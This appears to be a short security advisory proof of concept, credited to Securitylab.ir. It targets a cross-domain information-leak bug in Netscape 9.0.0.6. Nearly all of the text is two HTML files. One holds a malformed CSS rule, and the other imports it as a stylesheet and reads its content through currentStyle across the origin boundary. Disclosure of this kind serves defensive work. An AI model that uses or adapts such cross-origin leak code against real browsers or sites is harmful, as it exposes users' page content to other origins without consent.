PoC: 1.html: <body> {}body{DOM: Cross Domain Vulnerability 2.html: <style> @import url("1.html"); </style> <script> setTimeout(function(){ var s = document.body.currentStyle.DOM; alert(s); },0); </script> Vulnerable: Netscape v9.0.0.6 By: Securitylab.ir Original Advisory: http://Securitylab.ir/Advisories